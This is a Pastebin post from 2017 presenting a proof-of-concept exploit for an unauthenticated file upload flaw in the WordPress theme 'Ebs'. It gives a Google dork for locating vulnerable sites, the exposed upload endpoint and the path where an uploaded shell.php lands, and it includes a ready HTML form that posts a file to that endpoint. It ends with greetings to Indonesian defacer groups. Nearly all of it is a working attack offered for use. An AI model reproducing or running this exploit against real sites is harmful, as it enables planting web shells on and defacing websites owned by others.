daily pastebin goal
80%
SHARE
TWEET

[POC] Wordpress Theme Ebs File Upload Vulnerability

Berandal666 May 3rd, 2017 80 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #################################################################################
  2. # Wordpress Theme Ebs File Upload Vulnerability | CSRF
  3. # Author : Berandal
  4. # Google Dork: inurl:/wp-content/themes/ebs/
  5. # Tested on: Win 7, Linux
  6. # Blog : http://www.maxteroit.com/
  7. #################################################################################
  8.  
  9. +-+-+-+-+-+-+-+-+
  10. |B|e|r|a|n|d|a|l|
  11. +-+-+-+-+-+-+-+-+
  12.  
  13. # [!] Exploit : http://127.0.0.1/wp-content/themes/ebs/server/php/
  14. # [!] File Location : http://127.0.0.1/wp-content/themes/ebs/server/php/files/shell.php
  15.  
  16. #################################################################################
  17. #[*] CSRF:
  18. #################################################################################
  19. <html>
  20. <body>
  21. <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/ebs/server/php/" method="post">
  22. Your File: <input name="files[]" type="file" /><br />
  23. <input type="submit" value="SIKAT!" />
  24. </form>
  25. </body>
  26. </html>
  27. #################################################################################
  28. # [*] ABOUT:
  29. #################################################################################
  30. # Facebook: https://www.facebook.com/owlsquad.id
  31. # Twitter: https://www.twitter.com/id_berandal
  32. # Greetz : All Official Member OWL SQUAD - 6host Party Coder's - Alone Clown Security - and All Indonesian Defacer.
  33. #################################################################################
RAW Paste Data
Top